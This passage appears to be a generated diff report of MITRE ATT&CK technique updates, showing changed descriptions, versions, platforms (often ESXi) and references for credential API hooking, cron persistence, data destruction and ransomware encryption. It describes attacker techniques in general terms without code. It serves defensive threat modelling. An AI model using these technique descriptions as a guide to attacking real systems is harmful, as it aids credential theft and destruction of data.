| RInfoSecurity Dynamic Hooking 2015) | | ghTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSec |
| | | urity Dynamic Hooking 2015) In Linux and macOS, adversaries |
| | | may hook into system functions via the `LD_PRELOAD` (Linux) |
| | | or `DYLD_INSERT_LIBRARIES` (macOS) environment variables, w |
| | | hich enables loading shared libraries into a program’s addre |
| | | ss space. For example, an adversary may capture credentials |
| | | by hooking into the `libc read` function leveraged by SSH or |
| | | SCP.(Citation: Intezer Symbiote 2022) |
New Detections:
- DS0011: Module (Module Load)
- DS0017: Command (Command Execution)
- DS0022: File (File Creation)
- DS0022: File (File Modification)
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-08-27 21:03:56.385000+00:00 | 2025-04-15 19:59:21.920000+00:00 |
| description | Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001), this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
* **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Elastic Process Injection July 2017)
* **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Elastic Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
* **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Elastic Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
| Adversaries may hook into Windows application programming interface (API) functions and Linux system functions to collect user credentials. Malicious hooking mechanisms may capture API or function calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001), this technique focuses specifically on API functions that include parameters that reveal user credentials.
In Windows, hooking involves redirecting calls to these functions and can be implemented via:
* **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Elastic Process Injection July 2017)
* **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Elastic Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
* **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Elastic Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
In Linux and macOS, adversaries may hook into system functions via the `LD_PRELOAD` (Linux) or `DYLD_INSERT_LIBRARIES` (macOS) environment variables, which enables loading shared libraries into a program’s address space. For example, an adversary may capture credentials by hooking into the `libc read` function leveraged by SSH or SCP.(Citation: Intezer Symbiote 2022) |
| external_references[6]['description'] | Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved December 12, 2017. | Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved November 17, 2024. |
| external_references[6]['url'] | https://www.exploit-db.com/docs/17802.pdf | https://www.scribd.com/document/68671361/Inline-Hooking-in-Windows |
| x_mitre_version | 1.1 | 1.2 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| external_references | | {'source_name': 'Intezer Symbiote 2022', 'description': 'Joakim Kennedy and The BlackBerry Threat Research & Intelligence Team. (2022, June 9). Symbiote Deep-Dive: Analysis of a New, Nearly-Impossible-to-Detect Linux Threat. Retrieved March 24, 2025.', 'url': 'https://intezer.com/blog/research/new-linux-threat-symbiote/'} |
| x_mitre_data_sources | | Module: Module Load |
| x_mitre_data_sources | | File: File Creation |
| x_mitre_data_sources | | File: File Modification |
| x_mitre_data_sources | | Command: Command Execution |
| x_mitre_platforms | | Linux |
| x_mitre_platforms | | macOS |
[T1110.004] Brute Force: Credential Stuffing
Current version: 1.7
Version changed from: 1.6 → 1.7
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-14 22:11:30.271000+00:00 | 2025-04-15 19:58:59.077000+00:00 |
| x_mitre_version | 1.6 | 1.7 |
| x_mitre_platforms[6] | Network | Network Devices |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
[T1552.001] Unsecured Credentials: Credentials In Files
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_system_requirements | ['Access to files'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 14:28:43.639000+00:00 | 2025-04-15 19:58:47.301000+00:00 |
| x_mitre_version | 1.2 | 1.3 |
[T1552.002] Unsecured Credentials: Credentials in Registry
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_system_requirements | ["Ability to query some Registry locations depends on the adversary's level of access. User permissions are usually limited to access of user-related Registry keys."] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 16:26:46.873000+00:00 | 2025-04-15 19:58:20.405000+00:00 |
| x_mitre_version | 1.1 | 1.2 |
[T1053.003] Scheduled Task/Job: Cron
Current version: 1.3
Version changed from: 1.2 → 1.3
|
|
|---|
| t | Adversaries may abuse the <code>cron</code> utility to perfo | t | Adversaries may abuse the <code>cron</code> utility to perfo |
| rm task scheduling for initial or recurring execution of mal | | rm task scheduling for initial or recurring execution of mal |
| icious code.(Citation: 20 macOS Common Tools and Techniques) | | icious code.(Citation: 20 macOS Common Tools and Techniques) |
| The <code>cron</code> utility is a time-based job scheduler | | The <code>cron</code> utility is a time-based job scheduler |
| for Unix-like operating systems. The <code> crontab</code> | | for Unix-like operating systems. The <code> crontab</code> |
| file contains the schedule of cron entries to be run and th | | file contains the schedule of cron entries to be run and th |
| e specified times for execution. Any <code>crontab</code> fi | | e specified times for execution. Any <code>crontab</code> fi |
| les are stored in operating system-specific file paths. An | | les are stored in operating system-specific file paths. An |
| adversary may use <code>cron</code> in Linux or Unix environ | | adversary may use <code>cron</code> in Linux or Unix environ |
| ments to execute programs at system startup or on a schedule | | ments to execute programs at system startup or on a schedule |
| d basis for [Persistence](https://attack.mitre.org/tactics/T | | d basis for [Persistence](https://attack.mitre.org/tactics/T |
| A0003). | | A0003). In ESXi environments, cron jobs must be created dire |
| | | ctly via the crontab file (e.g., `/var/spool/cron/crontabs/r |
| | | oot`).(Citation: CloudSEK ESXiArgs 2023) |
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_permissions_required | ['User'] | |
| x_mitre_remote_support | False | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 18:45:51.945000+00:00 | 2025-04-15 19:58:16.429000+00:00 |
| description | Adversaries may abuse the cron utility to perform task scheduling for initial or recurring execution of malicious code.(Citation: 20 macOS Common Tools and Techniques) The cron utility is a time-based job scheduler for Unix-like operating systems. The crontab file contains the schedule of cron entries to be run and the specified times for execution. Any crontab files are stored in operating system-specific file paths.
An adversary may use cron in Linux or Unix environments to execute programs at system startup or on a scheduled basis for [Persistence](https://attack.mitre.org/tactics/TA0003). | Adversaries may abuse the cron utility to perform task scheduling for initial or recurring execution of malicious code.(Citation: 20 macOS Common Tools and Techniques) The cron utility is a time-based job scheduler for Unix-like operating systems. The crontab file contains the schedule of cron entries to be run and the specified times for execution. Any crontab files are stored in operating system-specific file paths.
An adversary may use cron in Linux or Unix environments to execute programs at system startup or on a scheduled basis for [Persistence](https://attack.mitre.org/tactics/TA0003). In ESXi environments, cron jobs must be created directly via the crontab file (e.g., `/var/spool/cron/crontabs/root`).(Citation: CloudSEK ESXiArgs 2023) |
| x_mitre_version | 1.2 | 1.3 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| external_references | | {'source_name': 'CloudSEK ESXiArgs 2023', 'description': 'Mehardeep Singh Sawhney. (2023, February 9). Analysis of Files Used in ESXiArgs Ransomware Attack Against VMware ESXi Servers. Retrieved March 26, 2025.', 'url': 'https://www.cloudsek.com/blog/analysis-of-files-used-in-esxiargs-ransomware-attack-against-vmware-esxi-servers'} |
| x_mitre_platforms | | ESXi |
[T1071.004] Application Layer Protocol: DNS
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-12-26 20:54:38.721000+00:00 | 2025-04-15 19:58:10.065000+00:00 |
| x_mitre_version | 1.2 | 1.3 |
| x_mitre_platforms[3] | Network | Network Devices |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
[T1568.003] Dynamic Resolution: DNS Calculation
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-27 20:54:28.287000+00:00 | 2025-04-15 19:58:47.388000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
[T1485] Data Destruction
Current version: 1.4
Version changed from: 1.3 → 1.4
|
|
|---|
| t | Adversaries may destroy data and files on specific systems o | t | Adversaries may destroy data and files on specific systems o |
| r in large numbers on a network to interrupt availability to | | r in large numbers on a network to interrupt availability to |
| systems, services, and network resources. Data destruction | | systems, services, and network resources. Data destruction |
| is likely to render stored data irrecoverable by forensic te | | is likely to render stored data irrecoverable by forensic te |
| chniques through overwriting files or data on local and remo | | chniques through overwriting files or data on local and remo |
| te drives.(Citation: Symantec Shamoon 2012)(Citation: FireEy | | te drives.(Citation: Symantec Shamoon 2012)(Citation: FireEy |
| e Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Ci | | e Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Ci |
| tation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon | | tation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon |
| 3 2018)(Citation: Talos Olympic Destroyer 2018) Common opera | | 3 2018)(Citation: Talos Olympic Destroyer 2018) Common opera |
| ting system file deletion commands such as <code>del</code> | | ting system file deletion commands such as <code>del</code> |
| and <code>rm</code> often only remove pointers to files with | | and <code>rm</code> often only remove pointers to files with |
| out wiping the contents of the files themselves, making the | | out wiping the contents of the files themselves, making the |
| files recoverable by proper forensic methodology. This behav | | files recoverable by proper forensic methodology. This behav |
| ior is distinct from [Disk Content Wipe](https://attack.mitr | | ior is distinct from [Disk Content Wipe](https://attack.mitr |
| e.org/techniques/T1561/001) and [Disk Structure Wipe](https: | | e.org/techniques/T1561/001) and [Disk Structure Wipe](https: |
| //attack.mitre.org/techniques/T1561/002) because individual | | //attack.mitre.org/techniques/T1561/002) because individual |
| files are destroyed rather than sections of a storage disk o | | files are destroyed rather than sections of a storage disk o |
| r the disk's logical structure. Adversaries may attempt to | | r the disk's logical structure. Adversaries may attempt to |
| overwrite files and directories with randomly generated data | | overwrite files and directories with randomly generated data |
| to make it irrecoverable.(Citation: Kaspersky StoneDrill 20 | | to make it irrecoverable.(Citation: Kaspersky StoneDrill 20 |
| 17)(Citation: Unit 42 Shamoon3 2018) In some cases political | | 17)(Citation: Unit 42 Shamoon3 2018) In some cases political |
| ly oriented image files have been used to overwrite data.(Ci | | ly oriented image files have been used to overwrite data.(Ci |
| tation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoo | | tation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoo |
| n Nov 2016)(Citation: Kaspersky StoneDrill 2017) To maximiz | | n Nov 2016)(Citation: Kaspersky StoneDrill 2017) To maximiz |
| e impact on the target organization in operations where netw | | e impact on the target organization in operations where netw |
| ork-wide availability interruption is the goal, malware desi | | ork-wide availability interruption is the goal, malware desi |
| gned for destroying data may have worm-like features to prop | | gned for destroying data may have worm-like features to prop |
| agate across a network by leveraging additional techniques l | | agate across a network by leveraging additional techniques l |
| ike [Valid Accounts](https://attack.mitre.org/techniques/T10 | | ike [Valid Accounts](https://attack.mitre.org/techniques/T10 |
| 78), [OS Credential Dumping](https://attack.mitre.org/techni | | 78), [OS Credential Dumping](https://attack.mitre.org/techni |
| ques/T1003), and [SMB/Windows Admin Shares](https://attack.m | | ques/T1003), and [SMB/Windows Admin Shares](https://attack.m |
| itre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2 | | itre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2 |
| 012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto | | 012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto |
| Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Cita | | Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Cita |
| tion: Talos Olympic Destroyer 2018). In cloud environments, | | tion: Talos Olympic Destroyer 2018). In cloud environments, |
| adversaries may leverage access to delete cloud storage obj | | adversaries may leverage access to delete cloud storage obj |
| ects, machine images, database instances, and other infrastr | | ects, machine images, database instances, and other infrastr |
| ucture crucial to operations to damage an organization or th | | ucture crucial to operations to damage an organization or th |
| eir customers.(Citation: Data Destruction - Threat Post)(Cit | | eir customers.(Citation: Data Destruction - Threat Post)(Cit |
| ation: DOJ - Cisco Insider) | | ation: DOJ - Cisco Insider) Similarly, they may delete virt |
| | | ual machines from on-prem virtualized environments. |
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-25 20:46:14.641000+00:00 | 2025-04-15 19:59:11.731000+00:00 |
| description | Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018)(Citation: Talos Olympic Destroyer 2018) Common operating system file deletion commands such as del and rm often only remove pointers to files without wiping the contents of the files themselves, making the files recoverable by proper forensic methodology. This behavior is distinct from [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) and [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) because individual files are destroyed rather than sections of a storage disk or the disk's logical structure.
Adversaries may attempt to overwrite files and directories with randomly generated data to make it irrecoverable.(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018) In some cases politically oriented image files have been used to overwrite data.(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)
To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware designed for destroying data may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Talos Olympic Destroyer 2018).
In cloud environments, adversaries may leverage access to delete cloud storage objects, machine images, database instances, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ - Cisco Insider) | Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018)(Citation: Talos Olympic Destroyer 2018) Common operating system file deletion commands such as del and rm often only remove pointers to files without wiping the contents of the files themselves, making the files recoverable by proper forensic methodology. This behavior is distinct from [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) and [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) because individual files are destroyed rather than sections of a storage disk or the disk's logical structure.
Adversaries may attempt to overwrite files and directories with randomly generated data to make it irrecoverable.(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018) In some cases politically oriented image files have been used to overwrite data.(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)
To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware designed for destroying data may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Talos Olympic Destroyer 2018).
In cloud environments, adversaries may leverage access to delete cloud storage objects, machine images, database instances, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ - Cisco Insider) Similarly, they may delete virtual machines from on-prem virtualized environments. |
| external_references[4]['description'] | FireEye. (2016, November 30). FireEye Responds to Wave of Destructive Cyber Attacks in Gulf Region. Retrieved January 11, 2017. | FireEye. (2016, November 30). FireEye Responds to Wave of Destructive Cyber Attacks in Gulf Region. Retrieved November 17, 2024. |
| external_references[4]['url'] | https://www.fireeye.com/blog/threat-research/2016/11/fireeye_respondsto.html | https://web.archive.org/web/20210126065851/https://www.fireeye.com/blog/threat-research/2016/11/fireeye_respondsto.html |
| x_mitre_version | 1.3 | 1.4 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
[T1132] Data Encoding
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-04-21 12:20:20.711000+00:00 | 2025-04-16 20:37:21.024000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
| x_mitre_version | 1.2 | 1.3 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
[T1486] Data Encrypted for Impact
Current version: 1.5
Version changed from: 1.4 → 1.5
|
|
|---|
| t | Adversaries may encrypt data on target systems or on large n | t | Adversaries may encrypt data on target systems or on large n |
| umbers of systems in a network to interrupt availability to | | umbers of systems in a network to interrupt availability to |
| system and network resources. They can attempt to render sto | | system and network resources. They can attempt to render sto |
| red data inaccessible by encrypting files or data on local a | | red data inaccessible by encrypting files or data on local a |
| nd remote drives and withholding access to a decryption key. | | nd remote drives and withholding access to a decryption key. |
| This may be done in order to extract monetary compensation | | This may be done in order to extract monetary compensation |
| from a victim in exchange for decryption or a decryption key | | from a victim in exchange for decryption or a decryption key |
| (ransomware) or to render data permanently inaccessible in | | (ransomware) or to render data permanently inaccessible in |
| cases where the key is not saved or transmitted.(Citation: U | | cases where the key is not saved or transmitted.(Citation: U |
| S-CERT Ransomware 2016)(Citation: FireEye WannaCry 2017)(Cit | | S-CERT Ransomware 2016)(Citation: FireEye WannaCry 2017)(Cit |
| ation: US-CERT NotPetya 2017)(Citation: US-CERT SamSam 2018) | | ation: US-CERT NotPetya 2017)(Citation: US-CERT SamSam 2018) |
| In the case of ransomware, it is typical that common user | | In the case of ransomware, it is typical that common user |
| files like Office documents, PDFs, images, videos, audio, te | | files like Office documents, PDFs, images, videos, audio, te |
| xt, and source code files will be encrypted (and often renam | | xt, and source code files will be encrypted (and often renam |
| ed and/or tagged with specific file markers). Adversaries ma | | ed and/or tagged with specific file markers). Adversaries ma |
| y need to first employ other behaviors, such as [File and Di | | y need to first employ other behaviors, such as [File and Di |
| rectory Permissions Modification](https://attack.mitre.org/t | | rectory Permissions Modification](https://attack.mitre.org/t |
| echniques/T1222) or [System Shutdown/Reboot](https://attack. | | echniques/T1222) or [System Shutdown/Reboot](https://attack. |
| mitre.org/techniques/T1529), in order to unlock and/or gain | | mitre.org/techniques/T1529), in order to unlock and/or gain |
| access to manipulate these files.(Citation: CarbonBlack Cont | | access to manipulate these files.(Citation: CarbonBlack Cont |
| i July 2020) In some cases, adversaries may encrypt critical | | i July 2020) In some cases, adversaries may encrypt critical |
| system files, disk partitions, and the MBR.(Citation: US-CE | | system files, disk partitions, and the MBR.(Citation: US-CE |
| RT NotPetya 2017) To maximize impact on the target organiz | | RT NotPetya 2017) Adversaries may also encrypt virtual machi |
| ation, malware designed for encrypting data may have worm-li | | nes hosted on ESXi or other hypervisors.(Citation: Crowdstri |
| ke features to propagate across a network by leveraging othe | | ke Hypervisor Jackpotting Pt 2 2021) To maximize impact on |
| r attack techniques like [Valid Accounts](https://attack.mit | | the target organization, malware designed for encrypting da |
| re.org/techniques/T1078), [OS Credential Dumping](https://at | | ta may have worm-like features to propagate across a network |
| tack.mitre.org/techniques/T1003), and [SMB/Windows Admin Sha | | by leveraging other attack techniques like [Valid Accounts] |
| res](https://attack.mitre.org/techniques/T1021/002).(Citatio | | (https://attack.mitre.org/techniques/T1078), [OS Credential |
| n: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017) E | | Dumping](https://attack.mitre.org/techniques/T1003), and [SM |
| ncryption malware may also leverage [Internal Defacement](ht | | B/Windows Admin Shares](https://attack.mitre.org/techniques/ |
| tps://attack.mitre.org/techniques/T1491/001), such as changi | | T1021/002).(Citation: FireEye WannaCry 2017)(Citation: US-CE |
| ng victim wallpapers, or otherwise intimidate victims by sen | | RT NotPetya 2017) Encryption malware may also leverage [Inte |
| ding ransom notes or other messages to connected printers (k | | rnal Defacement](https://attack.mitre.org/techniques/T1491/0 |
| nown as "print bombing").(Citation: NHS Digital Egregor Nov | | 01), such as changing victim wallpapers or ESXi server login |
| 2020) In cloud environments, storage objects within comprom | | messages, or otherwise intimidate victims by sending ransom |
| ised accounts may also be encrypted.(Citation: Rhino S3 Rans | | notes or other messages to connected printers (known as "pr |
| omware Part 1) | | int bombing").(Citation: NHS Digital Egregor Nov 2020)(Citat |
| | | ion: Varonis) In cloud environments, storage objects within |
| | | compromised accounts may also be encrypted.(Citation: Rhino |
| | | S3 Ransomware Part 1) For example, in AWS environments, adv |
| | | ersaries may leverage services such as AWS’s Server-Side Enc |
| | | ryption with Customer Provided Keys (SSE-C) to encrypt data. |
| | | (Citation: Halcyon AWS Ransomware 2025) |
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-06-16 13:07:10.318000+00:00 | 2025-04-15 19:59:00.731000+00:00 |
| description | Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.(Citation: US-CERT Ransomware 2016)(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017)(Citation: US-CERT SamSam 2018)
In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted (and often renamed and/or tagged with specific file markers). Adversaries may need to first employ other behaviors, such as [File and Directory Permissions Modification](https://attack.mitre.org/techniques/T1222) or [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529), in order to unlock and/or gain access to manipulate these files.(Citation: CarbonBlack Conti July 2020) In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.(Citation: US-CERT NotPetya 2017)
To maximize impact on the target organization, malware designed for encrypting data may have worm-like features to propagate across a network by leveraging other attack techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017) Encryption malware may also leverage [Internal Defacement](https://attack.mitre.org/techniques/T1491/001), such as changing victim wallpapers, or otherwise intimidate victims by sending ransom notes or other messages to connected printers (known as "print bombing").(Citation: NHS Digital Egregor Nov 2020)
In cloud environments, storage objects within compromised accounts may also be encrypted.(Citation: Rhino S3 Ransomware Part 1) | Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.(Citation: US-CERT Ransomware 2016)(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017)(Citation: US-CERT SamSam 2018)
In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted (and often renamed and/or tagged with specific file markers). Adversaries may need to first employ other behaviors, such as [File and Directory Permissions Modification](https://attack.mitre.org/techniques/T1222) or [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529), in order to unlock and/or gain access to manipulate these files.(Citation: CarbonBlack Conti July 2020) In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.(Citation: US-CERT NotPetya 2017) Adversaries may also encrypt virtual machines hosted on ESXi or other hypervisors.(Citation: Crowdstrike Hypervisor Jackpotting Pt 2 2021)
To maximize impact on the target organization, malware designed for encrypting data may have worm-like features to propagate across a network by leveraging other attack techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017) Encryption malware may also leverage [Internal Defacement](https://attack.mitre.org/techniques/T1491/001), such as changing victim wallpapers or ESXi server login messages, or otherwise intimidate victims by sending ransom notes or other messages to connected printers (known as "print bombing").(Citation: NHS Digital Egregor Nov 2020)(Citation: Varonis)
In cloud environments, storage objects within compromised accounts may also be encrypted.(Citation: Rhino S3 Ransomware Part 1) For example, in AWS environments, adversaries may leverage services such as AWS’s Server-Side Encryption with Customer Provided Keys (SSE-C) to encrypt data.(Citation: Halcyon AWS Ransomware 2025) |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
| x_mitre_version | 1.4 | 1.5 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| external_references | | {'source_name': 'Halcyon AWS Ransomware 2025', 'description': 'Halcyon RISE Team. (2025, January 13). Abusing AWS Native Services: Ransomware Encrypting S3 Buckets with SSE-C. Retrieved March 18, 2025.', 'url': 'https://www.halcyon.ai/blog/abusing-aws-native-services-ransomware-encrypting-s3-buckets-with-sse-c'} |
| external_references | | {'source_name': 'Varonis', 'description': 'Jason Hill. (2023, February 8). VMware ESXi in the Line of Ransomware Fire. Retrieved March 26, 2025.', 'url': 'https://www.varonis.com/blog/vmware-esxi-in-the-line-of-ransomware-fire'} |
| external_references | | {'source_name': 'Crowdstrike Hypervisor Jackpotting Pt 2 2021', 'description': 'Michael Dawson. (2021, August 30). Hypervisor Jackpotting, Part 2: eCrime Actors Increase Targeting of ESXi Servers with Ransomware. Retrieved March 26, 2025.', 'url': 'https://www.crowdstrike.com/en-us/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/'} |
| x_mitre_platforms | | ESXi |
[T1001] Data Obfuscation
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-07 15:07:47.232000+00:00 | 2025-04-15 19:58:57.412000+00:00 |
| x_mitre_version | 1.1 | 1.2 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
[T1074] Data Staged
Current version: 1.5
Version changed from: 1.4 → 1.5
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-30 13:28:37.415000+00:00 | 2025-04-15 19:58:45.225000+00:00 |
| external_references[1]['description'] | Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020. | Mandiant. (2020, February). M-Trends 2020. Retrieved November 17, 2024. |
| x_mitre_version | 1.4 | 1.5 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
[T1030] Data Transfer Size Limits
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-07-14 19:47:46.912000+00:00 | 2025-04-15 19:59:05.559000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
[T1602] Data from Configuration Repository
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-04-19 21:32:58.274000+00:00 | 2025-04-16 20:37:15.147000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_platforms[0] | Network | Network Devices |
[T1005] Data from Local System
Current version: 1.7
Version changed from: 1.6 → 1.7
|
|
|---|
| t | Adversaries may search local system sources, such as file sy | t | Adversaries may search local system sources, such as file sy |
| stems and configuration files or local databases, to find fi | | stems, configuration files, local databases, or virtual mach |
| les of interest and sensitive data prior to Exfiltration. A | | ine files, to find files of interest and sensitive data prio |
| dversaries may do this using a [Command and Scripting Interp | | r to Exfiltration. Adversaries may do this using a [Command |
